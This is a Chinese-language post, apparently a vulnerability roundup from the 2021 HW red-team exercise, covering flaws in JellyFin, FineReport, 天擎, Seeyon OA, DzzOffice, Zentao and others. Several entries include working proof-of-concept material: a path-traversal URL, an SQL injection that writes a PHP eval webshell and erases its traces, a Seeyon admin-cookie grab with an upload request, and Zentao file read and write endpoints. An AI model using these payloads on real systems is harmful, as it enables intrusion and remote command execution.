前言

2021的HW已经开始，在这期间会有许多的漏洞被披露出来，在本文将进行持续更新。

CVE-2021-21402 JellyFin 任意文件读取

漏洞简介

JellyFin的Windows端服务器不会对特定路径进行鉴权，可以导致攻击者利用Windows上的路径穿越来读取Windows服务器上的任意文件。本漏洞于2021年3月28日在最近版本的10.7.1中被修复。

影响版本

JellyFin <= 10.7.0

漏洞复现

以下是漏洞复现结果。

可以通过访问

http://<url>/Audio/anything/hls/<文件路径>/stream.mp3/

读取任意文件。

帆软 getshell FineReport V9 任意命令执行

漏洞简介

近日在网络上流传帆软的FineReport存在未认证的命令执行漏洞，经过官方的核实及测试，发现本漏洞并非0day，并不影响v10.0的版本。官方厂商已在去年发布相关修复。

影响版本

FineReport < v10.0

相关链接

https://forum.butian.net/share/57

和信创天云桌面命令执行

漏洞简介

由于服务端不会对上传的文件进行类型审查和权限审查，导致任意攻击者可以上传文件，严重可导致远程命令执行。

漏洞复现

首先通过Upload/upload_file.php上传文件，上传后的文件可以在l参数的目录下找到。例如上图的请求，上传后的文件会被保存到Upload/1/asd.php。

例如上图的请求，上传后的文件会被保存到Upload/1/asd.php。

默安蜜罐管理平台未授权问漏洞

漏洞简介

由于蜜罐管理平台鉴权不完善，可导致攻击者在未授权的情况下访问管理页面。默安官方发表通告并表示幻阵管理平台存在于内网网址，攻击者难以进行访问，且尽管可以访问也只能让幻阵执行ping指令，不会造成任何安全隐患。

相关链接

https://mp.weixin.qq.com/s/LV460_N1-EsQUM8YhM5nuw

天擎越权访问

漏洞简介

在Web登录界面且未登录的情况下会显示提示信息，并且会涉及用户组织，功能模块授权过期时间等。天擎官方发表声明并表示Web接口为正常接口，不存在漏洞。参考: https://forum.butian.net/share/58

天擎-前台sql注入

漏洞简介

可以让攻击者泄露服务端数据库，同时由于安装服务的用户极有可能拥有root权限，所以也可以进行webshell写入并达成命令执行。但本漏洞是内部一直问题，并且在2020年护网前的版本已经修复。

漏洞利用

目前公开的PoC如下:

https://<IP>/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to '<目标文件写入路径>';drop table O;--

本段PoC将首先创建新的数据库表，后将数据库内容更名为webshell的目标名，最后删除表清理痕迹。

致远OA-ajax.do上传文件漏洞

漏洞简介

可通过访问

http://<ip>/seeyon/thirdpartyController.do.css/..;/ajax.do

来测试是否有漏洞，如漏洞存在，则会出现java.lang.NullPointerException:null字样。

漏洞利用

首先是通过精心构造的请求来获取到管理员的cookie，流出POC如下:

targeturl=orgurl+'seeyon/thirdpartyController.do'
post='method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1'
    request = SendRequest(targeturl,post)
    response = request.send()
    rsp = ""
    if response and response.code == 200 and 'set-cookie' in str(response.headers).lower():
        cookies =  get_response_cookies(response.headers)

随后可以通过对目标路径发送POST请求和制作好的压缩文件即可达成文件上传。流出的PoC请求如下:

POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
loginPageURL=; login_locale=zh_CN;
Content-Type: application/x-www-form-urlencoded

managerMethod=validate&arguments=<请求数据>

若服务器没有返回“被迫下线”等字样，则证明上传成功。

相关链接

https://planet.vulbox.com/detail/412

WPS 0 Day RCE

漏洞简介

攻击者在通过恶意链接可以让WPS的内置浏览器进行沙箱逃逸和并令执行。请勿下载打开来路不明的WPS文件。

相关链接

https://planet.vulbox.com/detail/421

微软Exchange服务器 0 day命令执行漏洞

漏洞说明

攻击者可以通过把Exchange的认证绕过漏洞和权限提升漏洞结合在一起，完成对远程Exchange服务器的远程命令执行。详细信息将后续补充。

天融信DLP未授权越权

漏洞信息

管理界面可以通过未授权访问，并且在管理界面里更改密码时不会对原密码进行检查，所以攻击者可以通过未授权访问管理界面，并且对管理员账号进行随意更改。

DZZOffice远程命令执行

漏洞信息

由于DzzOffice中一部分代码是抄自Discuz， 而Discuz中存在随机数问题。弱随机导致DzzOffice的authkey变量在理论上可以被爆破出来，但实际操作难度较大。获得authkey之后可以利用authkey对上传文件数据进行加密，而后可以向/core/api/wopi/index.php发送POST请求和加密过后的文件数据进行文件上传。上传成功后可以访问上传的文件地址，并执行命令。

禅道11.6 多个漏洞

漏洞信息

所有的漏洞都需要至少普通用户的权限。禅道采取了新的路径解析方法，具体解析方式为getModel-<Model名字>-<Method名字>-<参数名字>=<参数的值>。而攻击者可以利用其中的一些过滤不当的API来进行SQL注入，文件读写最终可达成远程命令执行。

漏洞复现

首先是SQL注入，在禅道的api-getModel-api-sql-sql端点中，攻击者可以通过向本端点输入任意SQL语句从而达成SQL注入。

其次是文件读写，api-getModel-file-parseCSV-fileName可以让攻击者读取任意文件。

api-getModel-editor-save-filePath可以让攻击者通过发送POST请求上传任意文件。

而在本地运行禅道机器上可以找到相应文件。

相关链接

https://www.jianshu.com/p/62bb128ecbdb
https://xz.aliyun.com/t/8066